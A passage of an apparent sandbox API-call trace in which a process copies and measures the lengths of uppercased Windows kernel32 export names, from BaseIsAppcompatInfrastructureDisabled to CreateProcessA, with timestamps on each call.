lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.040] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.040] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.041] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.041] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.041] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.041] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.041] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.041] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.041] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.041] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.041] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.041] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.041] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.041] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.041] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.041] lstrlenA (lpString="BEEP") returned 4 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.041] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.041] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.041] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.041] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.041] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.042] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.042] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.042] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.042] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.042] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.042] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.042] lstrlenA (lpString="CANCELIO") returned 8 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.042] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.042] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.042] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.042] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.042] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.042] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.042] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.042] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.042] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.042] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.042] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.043] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.043] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.043] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.043] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.043] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.043] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.043] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.043] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.043] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.043] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.043] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.043] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.043] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.043] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.043] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.043] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.043] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.043] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.043] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.044] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.044] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.044] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.044] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.044] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.044] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.044] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.044] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.044] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.044] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.044] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.044] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.044] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.044] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.044] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.044] lstrlenA (lpString="COPYFILEA") returned 9 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.044] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.044] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.045] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.045] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.045] lstrlenA (lpString="COPYFILEW") returned 9 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.045] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.045] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.045] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.045] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.045] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.045] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.045] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.045] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.045] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.045] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.045] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.045] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.045] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.045] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.045] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.045] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.046] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.046] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.046] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.046] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.046] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.046] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.046] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.046] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.046] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.046] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.046] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.046] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.046] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.046] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.046] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.046] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.046] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.046] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.047] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.047] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.047] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.047] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.047] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.047] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.047] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.047] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.047] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.047] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.047] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.047] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.047] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.047] lstrcpyA 